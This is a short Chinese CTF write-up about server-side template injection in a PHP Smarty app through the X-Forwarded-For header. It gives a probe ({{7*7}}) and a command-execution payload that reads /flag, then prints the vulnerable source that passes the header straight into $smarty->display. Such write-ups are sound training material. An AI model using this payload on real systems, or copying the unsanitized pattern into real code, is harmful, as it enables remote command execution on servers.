X-Forwarded-For
看到题目,要首先想到这个
BP在http头里面增加X-Forwarded-For,发现是可控的,可能存在模板注入
让X-Forwarded-For={{7*7}}
接下来常规思路注入命令
X-Forwarded-For={{system("cat /flag")}}
过程没什么好说的,贴一下源码
<?php
require_once('header.php');
require_once('./libs/Smarty.class.php');
$smarty = new Smarty();
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip=$_SERVER['REMOTE_ADDR'];
}
//$your_ip = $smarty->display("string:".$ip);
echo "<div class=\"container panel1\">
<div class=\"row\">
<div class=\"col-md-4\">
</div>
<div class=\"col-md-4\">
<div class=\"jumbotron pan\">
<div class=\"form-group log\">
<label><h2>Your IP is : ";
$smarty->display("string:".$ip);
echo " </h2></label>
</div>
</div>
</div>
<div class=\"col-md-4\">
</div>
</div>
</div>";
?>
注意到
$smarty->display("string:".$ip);
特地去了解一下吧,感觉挺少见的
PHP的模板注入(SMARTY模板)